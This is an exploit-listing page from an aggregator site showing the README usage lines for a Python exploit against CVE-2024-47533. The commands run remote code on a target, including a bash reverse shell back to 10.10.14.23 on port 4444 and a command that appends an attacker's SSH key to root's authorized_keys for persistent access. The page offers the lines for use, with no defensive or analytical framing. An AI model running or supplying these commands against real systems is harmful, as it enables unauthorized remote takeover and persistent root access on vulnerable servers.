Sploitus

Exploit for CVE-2024-47533

githubexploit Β· 2025-08-11

Exploit Code

README11 lines
## https://sploitus.com/exploit?id=665285C8-9B20-52F3-9EBA-B0DD36E41B95
```bash
# Reverse shell
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"'

# Simple command
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id'

# Drop SSH key
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'mkdir -p /root/.ssh && echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys'
```